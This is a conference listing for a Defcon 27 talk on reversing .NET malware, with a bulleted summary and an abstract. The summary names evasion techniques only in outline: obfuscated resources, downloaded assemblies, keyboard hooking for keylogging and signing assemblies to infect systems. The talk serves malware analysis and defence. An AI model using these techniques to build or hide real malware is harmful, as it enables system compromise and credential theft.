.NET Malware Threats: Internals And Reversing

Conference:  Defcon 27



The presentation discusses the techniques used by dotnet malware to evade detection and infect systems.
  • Dotnet malware often hides malicious code in resources and encrypts or obfuscates it to evade detection
  • Dotnet malware can download external assemblies and use hooking to compromise systems
  • Compiling and signing dotnet assemblies is easy and can be used to infect systems
  • The presentation provides examples of dotnet malware code and demonstrates how to analyze it
The presenter shows how dotnet malware can hook keyboard operations to create a key logger and decrypt strings from the malware. They also demonstrate how to compile and sign a dotnet assembly to infect a system.


.NET malware is well-known by security analysts, but even existing many tools such as dnSpy,.NET Reflector, de4dot and so on to make the analysis easier, most professionals have used them as a black box tool, without concerning to .NET internals, structures, MSIL coding and details. In critical cases, it is necessary have enough knowledge about internal mechanisms and to debug these .NET threats using WinDbg. Unfortunately, .NET malware samples have become very challenger because it is so complicated to deobfuscated associated resources, as unpacking and dumping them from memory. Furthermore, most GUI debugging tools does an inside view of mechanisms such as CRL Loader, Managed Heap, Synchronization issues and Garbage Collection. In the other side, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which allows to see code injections using .MSIL and attempts to compromise .NET Runtime keep being a real concern. The purpose of this presentation is to help professionals to understand .NET malware threats and techniques by explaining concepts about .NET internals, mechanisms and few reversing techniques.